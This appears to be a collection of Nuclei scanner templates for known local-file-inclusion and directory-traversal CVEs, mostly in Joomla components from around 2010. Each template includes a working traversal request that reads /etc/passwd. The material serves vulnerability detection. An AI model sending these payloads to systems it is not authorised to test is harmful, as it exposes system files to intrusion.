| - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/13 30 | -------------------------------------------------------------------------------- /CVE-2010-1308.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1308 2 | 3 | info: 4 | name: Joomla! Component SVMap 1.1.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12066 10 | - https://www.cvedetails.com/cve/CVE-2010-1308 11 | - http://www.vupen.com/english/advisories/2010/0809 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1308 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1345.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1345 2 | 3 | info: 4 | name: Joomla! Component Cookex Agency CKForms - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/15453 10 | - https://www.cvedetails.com/cve/CVE-2010-1345 11 | - http://www.exploit-db.com/exploits/11785 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1345 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1353.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1353 2 | 3 | info: 4 | name: Joomla! Component LoginBox - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12068 10 | - https://www.cvedetails.com/cve/CVE-2010-1353 11 | - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ 12 | - http://www.vupen.com/english/advisories/2010/0808 13 | classification: 14 | cve-id: CVE-2010-1353 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/30 31 | -------------------------------------------------------------------------------- /CVE-2010-1470.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1470 2 | 3 | info: 4 | name: Joomla! Component Web TV 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12166 10 | - https://www.cvedetails.com/cve/CVE-2010-1470 11 | - http://secunia.com/advisories/39405 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1470 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1471.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1471 2 | 3 | info: 4 | name: Joomla! Component Address Book 1.5.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12170 10 | - https://www.cvedetails.com/cve/CVE-2010-1471 11 | - http://www.vupen.com/english/advisories/2010/0862 12 | classification: 13 | cve-id: CVE-2010-1471 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | # Enhanced by mp on 2022/02/14 29 | -------------------------------------------------------------------------------- /CVE-2010-1474.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1474 2 | 3 | info: 4 | name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12182 10 | - https://www.cvedetails.com/cve/CVE-2010-1474 11 | - http://secunia.com/advisories/39388 12 | classification: 13 | cve-id: CVE-2010-1474 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/30 30 | -------------------------------------------------------------------------------- /CVE-2010-1475.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1475 2 | 3 | info: 4 | name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12147 10 | - https://www.cvedetails.com/cve/CVE-2010-1475 11 | - http://secunia.com/advisories/39285 12 | classification: 13 | cve-id: CVE-2010-1475 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/24 30 | -------------------------------------------------------------------------------- /CVE-2010-1494.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1494 2 | 3 | info: 4 | name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12113 10 | - https://www.cvedetails.com/cve/CVE-2010-1494 11 | - http://www.exploit-db.com/exploits/12113 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1494 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1531.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1531 2 | 3 | info: 4 | name: Joomla! Component redSHOP 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12054 10 | - https://www.cvedetails.com/cve/CVE-2010-1531 11 | - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1531 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1533.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1533 2 | 3 | info: 4 | name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12142 10 | - https://www.cvedetails.com/cve/CVE-2010-1533 11 | - http://secunia.com/advisories/39258 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1533 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/15 30 | -------------------------------------------------------------------------------- /CVE-2010-1535.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1535 2 | 3 | info: 4 | name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12151 10 | - https://www.cvedetails.com/cve/CVE-2010-1535 11 | - http://secunia.com/advisories/39254 12 | classification: 13 | cve-id: CVE-2010-1535 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/24 30 | -------------------------------------------------------------------------------- /CVE-2010-1540.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1540 2 | 3 | info: 4 | name: Joomla! Component com_blog - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11625 10 | - https://www.cvedetails.com/cve/CVE-2010-1540 11 | - http://secunia.com/advisories/38777 12 | - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ 13 | classification: 14 | cve-id: CVE-2010-1540 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/06 31 | -------------------------------------------------------------------------------- /CVE-2010-1601.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1601 2 | 3 | info: 4 | name: Joomla! Component JA Comment - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12236 10 | - https://www.cvedetails.com/cve/CVE-2010-1601 11 | - http://secunia.com/advisories/39472 12 | - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt 13 | classification: 14 | cve-id: CVE-2010-1601 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/24 31 | -------------------------------------------------------------------------------- /CVE-2010-1602.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1602 2 | 3 | info: 4 | name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12283 10 | - https://www.cvedetails.com/cve/CVE-2010-1602 11 | - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt 12 | classification: 13 | cve-id: CVE-2010-1602 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/30 30 | -------------------------------------------------------------------------------- /CVE-2010-1714.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1714 2 | 3 | info: 4 | name: Joomla! Component Arcade Games 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12168 10 | - https://www.cvedetails.com/cve/CVE-2010-1714 11 | - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt 12 | - http://secunia.com/advisories/39413 13 | classification: 14 | cve-id: CVE-2010-1714 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/02/28 31 | -------------------------------------------------------------------------------- /CVE-2010-1719.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1719 2 | 3 | info: 4 | name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12233 10 | - https://www.cvedetails.com/cve/CVE-2010-1719 11 | - http://www.exploit-db.com/exploits/12233 12 | classification: 13 | cve-id: CVE-2010-1719 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/01 30 | -------------------------------------------------------------------------------- /CVE-2010-1722.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1722 2 | 3 | info: 4 | name: Joomla! Component Online Market 2.x - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12177 10 | - https://www.cvedetails.com/cve/CVE-2010-1722 11 | - http://secunia.com/advisories/39409 12 | - http://www.exploit-db.com/exploits/12177 13 | classification: 14 | cve-id: CVE-2010-1722 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/01 31 | -------------------------------------------------------------------------------- /CVE-2010-1723.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1723 2 | 3 | info: 4 | name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12289 10 | - https://www.cvedetails.com/cve/CVE-2010-1723 11 | - http://secunia.com/advisories/39524 12 | classification: 13 | cve-id: CVE-2010-1723 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/01 30 | -------------------------------------------------------------------------------- /CVE-2010-1873.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1873 2 | 3 | info: 4 | name: Joomla! Component Jvehicles - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11997 10 | - https://www.cvedetails.com/cve/CVE-2010-1873 11 | tags: cve,cve2010,joomla,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "root:.*:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 -------------------------------------------------------------------------------- /CVE-2010-1956.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1956 2 | 3 | info: 4 | name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12285 10 | - https://www.cvedetails.com/cve/CVE-2010-1956 11 | - http://secunia.com/advisories/39522 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1956 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/15 30 | -------------------------------------------------------------------------------- /CVE-2010-1979.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1979 2 | 3 | info: 4 | name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12088 10 | - https://www.cvedetails.com/cve/CVE-2010-1979 11 | - http://secunia.com/advisories/39360 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1979 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/17 34 | -------------------------------------------------------------------------------- /CVE-2010-4231.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-4231 2 | 3 | info: 4 | name: Camtron CMNC-200 IP Camera - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. 8 | reference: 9 | - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 10 | - https://www.exploit-db.com/exploits/15505 11 | - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt 12 | - http://www.exploit-db.com/exploits/15505/ 13 | remediation: Upgrade to a supported product version. 14 | classification: 15 | cve-id: CVE-2010-4231 16 | tags: cve,cve2010,iot,lfi,camera 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/17 34 | -------------------------------------------------------------------------------- /CVE-2011-2744.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2011-2744 2 | 3 | info: 4 | name: Chyrp 2.x - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. 8 | reference: 9 | - https://www.exploit-db.com/exploits/35945 10 | - https://www.cvedetails.com/cve/CVE-2011-2744 11 | - http://www.openwall.com/lists/oss-security/2011/07/13/6 12 | - http://secunia.com/advisories/45184 13 | classification: 14 | cve-id: CVE-2011-2744 15 | tags: cve,cve2011,lfi,chyrp 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/18 34 | -------------------------------------------------------------------------------- /CVE-2012-0981.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2012-0981 2 | 3 | info: 4 | name: phpShowtime 2.0 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/18435 10 | - https://www.cvedetails.com/cve/CVE-2012-0981 11 | - http://secunia.com/advisories/47802 12 | - http://www.exploit-db.com/exploits/18435 13 | classification: 14 | cve-id: CVE-2012-0981 15 | tags: cve,cve2012,lfi,phpshowtime 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/21 34 | -------------------------------------------------------------------------------- /CVE-2012-0996.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2012-0996 2 | 3 | info: 4 | name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) 5 | author: daffainfo 6 | severity: high 7 | description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/36784 10 | - https://www.cvedetails.com/cve/CVE-2012-0996 11 | - https://www.htbridge.ch/advisory/HTB23071 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2012-0996 15 | tags: cve,cve2012,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/18 34 | -------------------------------------------------------------------------------- /CVE-2013-5979.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2013-5979 2 | 3 | info: 4 | name: Xibo 1.2.2/1.4.1 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/26955 10 | - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 11 | - https://www.cvedetails.com/cve/CVE-2013-5979 12 | - https://bugs.launchpad.net/xibo/+bug/1093967 13 | classification: 14 | cve-id: CVE-2013-5979 15 | tags: cve,cve2013,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/24 34 | -------------------------------------------------------------------------------- /CVE-2014-10037.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-10037 2 | 3 | info: 4 | name: DomPHP 0.83 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/30865 10 | - https://www.cvedetails.com/cve/CVE-2014-10037 11 | - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 12 | - http://osvdb.org/show/osvdb/102204 13 | classification: 14 | cve-id: CVE-2014-10037 15 | tags: cve,cve2014,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/24 34 | -------------------------------------------------------------------------------- /CVE-2015-9480.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-9480 2 | 3 | info: 4 | name: WordPress RobotCPA 5 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/37252 10 | - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 11 | classification: 12 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 13 | cvss-score: 7.5 14 | cve-id: CVE-2015-9480 15 | cwe-id: CWE-22 16 | tags: cve,cve2015,wordpress,wp-plugin,lfi 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: regex 26 | regex: 27 | - 